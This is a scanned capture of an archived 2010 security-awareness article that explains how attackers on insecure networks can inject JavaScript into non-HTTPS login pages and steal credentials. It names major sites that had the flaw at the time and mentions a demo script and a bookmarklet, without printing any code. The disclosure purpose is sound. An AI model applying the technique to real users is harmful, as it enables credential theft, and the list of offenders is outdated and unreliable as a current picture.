www.stealmylogin.com Open in urlscan Pro
13.215.144.61  Public Scan

Form analysis
0 forms found in the DOM

Text Content

This page is an archived 10+ year old article and is severely outdated. Since
its publication in 2010, the companies mentioned below and pretty much the
entire web moved their login forms and often entire websites to HTTPS. Still,
this historical article demonstrates how even big companies might not follow
security best practices and as a result endanger their customers.


STEAL MY LOGIN

written by Alex Sirota

Exposing the dangers of insecure login forms



14 Comments


INTRO

We often use an insecure internet connection to browse the web - for example
using a public Wi-Fi hotspot or if our router is configured to communicate using
an insecure protocol. This exposes us to Man-in-the-middle attacks, with
malicious attackers trying to steal our login information, passwords etc.

There is an easy solution to this problem - when sending sensitive information a
website should always use a secure protocol such as HTTPS. This way, attackers
listening to the communication only see encrypted info they cannot decrypt. You
know that your communication is secure when the website address starts with
'https:' and your browser displays a lock icon and additional UI cues.


THE PROBLEM

While most websites implemented a secure way to send login information, their
implementation is flawed, still allowing a malicious attacker to steal your
login information.

In order for the secure login form to protect you, both the page that displays
the login form and the page the form is being submitted to need to be HTTPS.

Many of the biggest sites on the Web have non-HTTPS pages hosting the actual
login form, even if they submit the login info to an HTTPS page.

A malicious attacker can easily inject some code to the non-HTTPS page that
hosts the login form, and steal your info just before it is being securely
submitted.


DEMO

Check out the StealMyLogin demo. Similarly to many sites, in the demo a
non-HTTPS page contains a login form that is securely submitted to an HTTPS
page.

If you look at the source code of the demo page, you'll see that we injected a
malicious JavaScript file stealmylogin.js into the page, just as an attacker
might. This malicious code steals the login info just before its being securely
submitted to the service.


BOOKMARKLET

Want to try this attack yourself on one of your favorite websites? Just drag the
following link StealMyLogin to your browser's toolbar, navigate to a non-HTTPS
page that has a login form, click on the bookmarklet to simulate an attacker
injecting a malicious piece of code into the page, and proceed to login into the
service.


LIST OF OFFENDERS

This is obviously a very partial list, but it's amazing how many of the biggest
sites on the Web have this significant security flaw.
 * LinkedIn
 * Twitter
 * Facebook
 * AT&T
 * Netflix
 * GoDaddy
 * Progressive
 * Tivo
 * UPS


ADDITIONAL BACKGROUND

Some assumptions:
 1. There are bad people out there looking to steal your bank or credit card
    information, your money and your identity.
 2. Many people use the same password and username in many different online
    services, including banks.
 3. Malicious attackers will try to get your login information for any of the
    services you're using, which will then allow them to break into the rest.

There are several ways an attacker can try and steal your login information,
like:

 * Phishing - sending you an email linking to a fake site that looks like the
   real thing.
 * Cross-site scripting (XSS) - exploiting a vulnerability in a website to
   inject custom JavaScript code that would then try to steal your info.
 * Man-in-the-middle attack - listening to information flowing through an
   insecure data connection (like a malicious "free" wifi hotspot), potentially
   injecting malicious code into the visited websites.

Here, we are discussing the last type of attack - Man-in-the-middle.


REFERENCES

 * TLS and SSL in the real world


DISCUSS



Please enable JavaScript to view the comments powered by Disqus.
Tags: security, identity theft, phishing, https, ssl, login form, username,
passwords
Copyright © 2010 Alex Sirota